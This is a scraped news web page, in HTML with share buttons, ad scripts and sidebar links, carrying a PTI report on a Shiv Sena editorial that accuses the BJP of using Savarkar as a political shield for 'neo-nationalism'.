onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/&title=BJP using Savarkar as shield for neo-nationalism politics: Sena&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1.jpg&amp;
url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/&amp;
is_video=false&amp;description=BJP using Savarkar as shield for neo-nationalism politics: Sena"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    
<p>Mumbai: The Shiv Sena on Thursday accused the BJP of using Hindutva ideologue Veer Savarkar as a &#8220;shield&#8221; to play the politics of neo-nationalism.</p>



<div class="wp-block-image"><figure class="aligncenter"><img src="http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1.jpg?x39047" alt="" class="wp-image-458155" srcset="http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1.jpg 400w, http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1-300x176.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" /></figure></div>



<p>Terming the BJP&#8217;s love for Savarkar as &#8220;fake&#8221;, the Sena said that instead of targeting the Maharashtra government, the state BJP leaders should ask why the party- ruled Centre has failed to honour the freedom fighter so far.</p>



<p>It also said that if the BJP thought that it could corner the Sena over the issue of Savarkar, then it was mistaken.</p>



<p>&#8220;The BJP leaders in Maharashtra declared that they would target the (state) government on the issue of Veer Savarkar. This makes it clear that Savarkar is not a subject of respect or faith for the BJP, but just a political issue,&#8221; the Sena said in its editorial in party mouthpiece &#8216;Saamana&#8217;.</p>



<p>&#8220;Veer Savarkar is not merely a subject of discussion, but he should be practised in life. Savarkar&#8217;s life symbolised sacrifice, principles, radiance and struggle,&#8221; it added.</p>



<p>&#8220;Everyone paid respects to Savarkar on his death anniversary (observed on Wednesday). But those who pretend to remember Savarkar, have they really understood him? BJP says it will corner the government on the issue of Savarkar. But those who themselves are cornered, should not talk about cornering others,&#8221; the Uddhav Thackeray-led party said.</p>



<p>Instead of targeting the Maharashtra government, whether the BJP-ruled Centre has honoured Savarkar is the question that the BJP leaders in the state should ask, it added.</p>



<p>&#8220;Why didn&#8217;t the Centre confer Bharat Ratna on Savarkar on the Republic Day? Will the neo-fans of Savarkar throw some light on it? Demand for passing a resolution in Maharashtra Assembly in honour of Savarkar if fine.</p>



<p>&#8220;But what happened to the letters sent to Prime Minister Narendra Modi by former chief minister Devendra Fadnavis in which he sought Bharat Ratna for Savarkar? The Centre did not even take note of the letters. This is an insult of Maharashtra and Veer Savarkar,&#8221; the Sena said.</p>



<p>After his release from Andaman (Cellular Jail), Savarkar devoted his life to social work in Ratnagiri.</p>



<p>&#8220;Political leaders, including Mahatma Gandhi and RSS founder Hedgewar, met him. Gandhiji sought his cooperation for eradication of untouchability and propagation of Swadeshi,&#8221; it added.</p>



<p>&#8220;Savarkar had a huge contribution in the freedom struggle. But where was the BJP or the then &#8216;Sangh Parivar&#8217; during that movement? The RSS did not even recognise the national flag. Those who insult the national flag are called traitors,&#8221; the saffron party said.</p>



<p>&#8220;Sardar Patel had imposed a ban on RSS twice. While lifting the ban both the times Patel set the condition that it has to accept the tricolour as a national flag. Golwalkar Guruji (of RSS) accepted this condition, but &#8220;records&#8221; say that the Sangh did not keep its word till 2002.</p>



<p>&#8220;The organisations which call themselves nationalist, were not ready to hoist the tricolour till 2002. Saffron flag is also the symbol of Shiv Sena, but along with that flag, the tricolour is also hoisted. This is our nationalism,&#8221; the party added.</p>



<p>&#8220;The BJP is playing the politics of neo-nationalism by using Swatantryaveer Savarkar as a &#8216;shield&#8217;. If they think the Shiv Sena will be caught in a tight spot, then they are mistaken. Sena won&#8217;t be caught in a dilemma. Instead, those who are pretending will be hit. Their love for Savarkar is all fake,&#8221; it said.</p>



<p>BJP&#8217;s demand for a state government resolution honouring Savarkar for his contribution to the Independence struggle did not find support in both Houses of the Maharashtra Legislature on Wednesday.</p>



<p>While Assembly Speaker Nana Patole rejected the BJP&#8217;s demand, triggering protest from its leaders, in the Legislative Council, Deputy Chairperson Neelam Gorhe refused to entertain the saffron party&#8217;s move as she adjourned the House when a BJP leader stood up to speak about it. (PTI)</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-781 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-781 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-781 .adr-next',
				prev: '.e3lanat-rotator-id-781 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-781" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="588931">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=BJP using Savarkar as shield for neo-nationalism politics: Sena&url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/&title=BJP using Savarkar as shield for neo-nationalism politics: Sena&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1.jpg&amp;
url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/&amp;
is_video=false&amp;description=BJP using Savarkar as shield for neo-nationalism politics: Sena"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Cong-govt-in-Punjab-suffering-from-karo-na-virus-Opposition.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Cong-govt-in-Punjab-suffering-from-karo-na-virus-Opposition.jpg" alt="BJP using Savarkar as shield for neo-nationalism politics: Sena"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/">Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition</a></h3>
                        </div>
                    </li>
		    		                        <li class="np-post next border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/"><img src="http://news.statetimes.in/wp-content/uploads/2016/10/CBI-registers-FIR-against-UK-based-arms-dealer-in-Embraer-deal.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/10/CBI-registers-FIR-against-UK-based-arms-dealer-in-Embraer-deal.jpg" alt="BJP using Savarkar as shield for neo-nationalism politics: Sena"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/" class="link next"><i class="fa-icon-double-angle-right alignright"></i>Next</a>
                            <h3><a href="http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/">CBI arrests illegal migrant after 22 years on RCN basis</a></h3>
                        </div>
                    </li>
		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/"><img src="http://news.statetimes.in/wp-content/uploads/2016/10/CBI-registers-FIR-against-UK-based-arms-dealer-in-Embraer-deal.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/10/CBI-registers-FIR-against-UK-based-arms-dealer-in-Embraer-deal.jpg" alt="CBI arrests illegal migrant after 22 years on RCN basis"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/">CBI arrests illegal migrant after 22 years on RCN basis</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-02-27T13:07:34+00:00">February 27, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Cong-govt-in-Punjab-suffering-from-karo-na-virus-Opposition.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Cong-govt-in-Punjab-suffering-from-karo-na-virus-Opposition.jpg" alt="Cong govt in Punjab suffering from 'karo na' virus: Opposition"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/">Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-02-27T12:54:09+00:00">February 27, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/transfer-of-justice-muralidhar-done-on-recommendation-of-sc-collegium-ravi-shankar-prasad/"><img src="http://news.statetimes.in/wp-content/uploads/2015/02/ravi-shankar-prasad.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2015/02/ravi-shankar-prasad.jpg" alt="Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/transfer-of-justice-muralidhar-done-on-recommendation-of-sc-collegium-ravi-shankar-prasad/">Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-02-27T12:50:15+00:00">February 27, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/pm-modi-greets-karnataka-cm-yediyurappa-on-his-77th-birthday/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/modi-yediappa.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/modi-yediappa.jpg" alt="PM Modi greets Karnataka CM Yediyurappa on his 77th birthday"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/pm-modi-greets-karnataka-cm-yediyurappa-on-his-77th-birthday/">PM Modi greets Karnataka CM Yediyurappa on his 77th birthday</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-02-27T12:48:02+00:00">February 27, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/sonia-gandhi-led-cong-delegation-meets-kovind-over-delhi-violence/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/sonia-delhi.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/sonia-delhi.jpg" alt="Sonia Gandhi-led Cong delegation meets Kovind over Delhi violence"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/sonia-gandhi-led-cong-delegation-meets-kovind-over-delhi-violence/">Sonia Gandhi-led Cong delegation meets Kovind over Delhi violence</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-02-27T12:48:00+00:00">February 27, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/plea-by-injured-jamia-student-for-compensation-hc-seeks-govt-police-stand/"><img src="http://news.statetimes.in/wp-content/uploads/2014/09/delhi-high-court.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2014/09/delhi-high-court.jpg" alt="Plea by injured Jamia student for compensation: HC seeks govt, police stand"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/plea-by-injured-jamia-student-for-compensation-hc-seeks-govt-police-stand/">Plea by injured Jamia student for compensation: HC seeks govt, police stand</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-02-27T12:41:28+00:00">February 27, 2020</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='588931' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="a6ee0e3270" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="170"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/">CBI arrests illegal migrant after 22 years on RCN basis</a></li>

			
			<li><a href="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/">BJP using Savarkar as shield for neo-nationalism politics: Sena</a></li>

			
			<li><a href="http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/">Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition</a></li>

			
			<li><a href="http://news.statetimes.in/transfer-of-justice-muralidhar-done-on-recommendation-of-sc-collegium-ravi-shankar-prasad/">Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad</a></li>

			
			<li><a href="http://news.statetimes.in/pm-modi-greets-karnataka-cm-yediyurappa-on-his-77th-birthday/">PM Modi greets Karnataka CM Yediyurappa on his 77th birthday</a></li>

			
			<li><a href="http://news.statetimes.in/sonia-gandhi-led-cong-delegation-meets-kovind-over-delhi-violence/">Sonia Gandhi-led Cong delegation meets Kovind over Delhi violence</a></li>

			
			<li><a href="http://news.statetimes.in/plea-by-injured-jamia-student-for-compensation-hc-seeks-govt-police-stand/">Plea by injured Jamia student for compensation: HC seeks govt, police stand</a></li>

			
			<li><a href="http://news.statetimes.in/northeast-delhi-violence-death-toll-reaches-34/">Northeast Delhi violence: Death toll reaches 34</a></li>

			
			<li><a href="http://news.statetimes.in/rahanes-mantra-for-2nd-test-show-more-intent-and-negate-angles-created-by-nz-pacers/">Rahane&#8217;s mantra for 2nd Test: Show more intent and negate angles created by NZ pacers</a></li>

			
			<li><a href="http://news.statetimes.in/expect-tokyo-olympics-to-go-ahead-as-scheduled-despite-coronavirus-concerns-rijiju/">Expect Tokyo Olympics to go ahead as scheduled despite coronavirus concerns: Rijiju</a></li>

			
			<li><a href="http://news.statetimes.in/bjps-politics-of-revenge-exposed-cong-on-transfer-of-delhi-hc-judge-muralidhar/">BJP&#8217;s politics of revenge exposed: Cong on transfer of Delhi HC Judge Muralidhar</a></li>

			
			<li><a href="http://news.statetimes.in/way-forward-for-any-country-is-by-educating-itself-more-shah-rukh/">Way forward for any country is by educating itself more: Shah Rukh</a></li>

			
			<li><a href="http://news.statetimes.in/paramilitary-personnel-provide-security-cover-for-last-journey-of-man-killed-in-delhi-clashes/">Paramilitary personnel provide security cover for last journey of man killed in Delhi clashes</a></li>

			
			<li><a href="http://news.statetimes.in/court-convicts-11-in-law-student-rape-case/">Court convicts 11 in law student rape case</a></li>

			
			<li><a href="http://news.statetimes.in/effort-of-every-individual-vital-for-making-jammu-swachh-sat-2/">Effort of every individual vital for making Jammu Swachh: Sat</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/union-mos-lg-discuss-modalities-for-strengthening-power-sector-in-jk/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Union-MoS-Lt-Governor-chairing-high-level-meeting-to-review-the-Power-and-Renewable-Energy-Scenario-in-JK.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Union-MoS-Lt-Governor-chairing-high-level-meeting-to-review-the-Power-and-Renewable-Energy-Scenario-in-JK.jpg" alt="Union MoS, LG discuss modalities for strengthening power sector in J&K" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/union-mos-lg-discuss-modalities-for-strengthening-power-sector-in-jk/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Union-MoS-Lt-Governor-chairing-high-level-meeting-to-review-the-Power-and-Renewable-Energy-Scenario-in-JK.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Union-MoS-Lt-Governor-chairing-high-level-meeting-to-review-the-Power-and-Renewable-Energy-Scenario-in-JK.jpg" alt="Union MoS, LG discuss modalities for strengthening power sector in J&K" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/union-mos-lg-discuss-modalities-for-strengthening-power-sector-in-jk/">Union MoS, LG discuss modalities for strengthening power sector in J&#038;K</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:08:39+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/nia-conducts-raids-in-connection-with-nagrota-encounter/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/NIA.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/NIA.jpg" alt="NIA conducts raids in connection with Nagrota encounter" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/nia-conducts-raids-in-connection-with-nagrota-encounter/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/NIA.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/NIA.jpg" alt="NIA conducts raids in connection with Nagrota encounter" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/nia-conducts-raids-in-connection-with-nagrota-encounter/">NIA conducts raids in connection with Nagrota encounter</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:08:15+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/security-of-jammu-srinagar-airports-handed-over-to-cisf-2/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Security of Jammu, Srinagar airports handed over to CISF" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/security-of-jammu-srinagar-airports-handed-over-to-cisf-2/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Security of Jammu, Srinagar airports handed over to CISF" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/security-of-jammu-srinagar-airports-handed-over-to-cisf-2/">Security of Jammu, Srinagar airports handed over to CISF</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:46+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/remain-alert-be-prepared-for-any-security-challenge-army-chief-to-troops-in-kashmir/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Photo-1-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Photo-1-1.jpg" alt="Remain alert, be prepared for any security challenge: Army Chief to troops in Kashmir" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/remain-alert-be-prepared-for-any-security-challenge-army-chief-to-troops-in-kashmir/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Photo-1-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Photo-1-1.jpg" alt="Remain alert, be prepared for any security challenge: Army Chief to troops in Kashmir" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/remain-alert-be-prepared-for-any-security-challenge-army-chief-to-troops-in-kashmir/">Remain alert, be prepared for any security challenge: Army Chief to troops in Kashmir</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:34+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/jk-was-is-and-shall-forever-remain-our-integral-part-india-tells-pakistan/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="J&K ‘was, is and shall forever’ remain our integral part: India tells Pakistan" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/jk-was-is-and-shall-forever-remain-our-integral-part-india-tells-pakistan/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="J&K ‘was, is and shall forever’ remain our integral part: India tells Pakistan" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/jk-was-is-and-shall-forever-remain-our-integral-part-india-tells-pakistan/">J&#038;K ‘was, is and shall forever’ remain our integral part: India tells Pakistan</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:32+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/are-hindus-safe-in-india-that-is-hindustan-that-is-bharat/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Are Hindus safe in India- that is Hindustan that is Bharat?" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/are-hindus-safe-in-india-that-is-hindustan-that-is-bharat/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Are Hindus safe in India- that is Hindustan that is Bharat?" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/are-hindus-safe-in-india-that-is-hindustan-that-is-bharat/">Are Hindus safe in India- that is Hindustan that is Bharat?</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:23+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/cabinet-nod-on-adopting-central-laws-in-concurrent-list-for-jk/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Cabinet nod on adopting central laws in Concurrent List for J&K" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/cabinet-nod-on-adopting-central-laws-in-concurrent-list-for-jk/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Cabinet nod on adopting central laws in Concurrent List for J&K" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/cabinet-nod-on-adopting-central-laws-in-concurrent-list-for-jk/">Cabinet nod on adopting central laws in Concurrent List for J&#038;K</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:19+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
